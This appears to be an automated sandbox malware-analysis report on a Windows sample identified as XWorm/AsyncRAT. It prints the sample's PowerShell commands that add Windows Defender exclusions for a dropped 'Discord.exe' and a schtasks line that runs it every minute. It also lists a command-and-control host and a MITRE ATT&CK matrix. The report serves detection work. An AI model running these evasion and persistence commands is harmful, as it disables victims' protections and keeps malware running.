                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeQueries volume information: C:\Users\user\Desktop\s3OBQLA3xR.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Discord.exeQueries volume information: C:\Users\user\AppData\Roaming\Discord.exe VolumeInformation
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: s3OBQLA3xR.exe, 00000000.00000002.3000236773.000000001BAEE000.00000004.00000020.00020000.00000000.sdmp, s3OBQLA3xR.exe, 00000000.00000002.3000236773.000000001BB3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected XWorm
                    Source: Yara matchFile source: s3OBQLA3xR.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: s3OBQLA3xR.exe PID: 7352, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Yara detected XWorm
                    Source: Yara matchFile source: s3OBQLA3xR.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: s3OBQLA3xR.exe PID: 7352, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		11
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping541
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		21
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    PowerShell                    		1
                    DLL Side-Loading                    		21
                    Registry Run Keys / Startup Folder                    		151
                    Virtualization/Sandbox Evasion                    		Security Account Manager151
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading                    		11
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    System Network Configuration Discovery                    		SSHKeylogging12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Software Packing                    		DCSync23
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532616 Sample: s3OBQLA3xR.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 40 methods-availability.gl.at.ply.gg 2->40 42 ip-api.com 2->42 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 13 other signatures 2->54 8 s3OBQLA3xR.exe 15 6 2->8         started        13 Discord.exe 2->13         started        15 Discord.exe 2->15         started        17 3 other processes 2->17 signatures3 process4 dnsIp5 44 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 8->44 46 methods-availability.gl.at.ply.gg 147.185.221.23, 20557, 49739 SALSGIVERUS United States 8->46 38 C:\Users\user\AppData\Roaming\Discord.exe, PE32 8->38 dropped 58 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->58 60 Protects its processes via BreakOnTermination flag 8->60 62 Bypasses PowerShell execution policy 8->62 70 3 other signatures 8->70 19 powershell.exe 22 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 64 Antivirus detection for dropped file 13->64 66 Multi AV Scanner detection for dropped file 13->66 68 Machine Learning detection for dropped file 13->68 file6 signatures7 process8 signatures9 56 Loading BitLocker PowerShell Module 19->56 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    s3OBQLA3xR.exe76%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                    s3OBQLA3xR.exe65%VirustotalBrowse
                    s3OBQLA3xR.exe100%AviraTR/Spy.Gen
                    s3OBQLA3xR.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Discord.exe100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Roaming\Discord.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Discord.exe76%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                    C:\Users\user\AppData\Roaming\Discord.exe65%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    methods-availability.gl.at.ply.gg4%VirustotalBrowse
                    ip-api.com0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
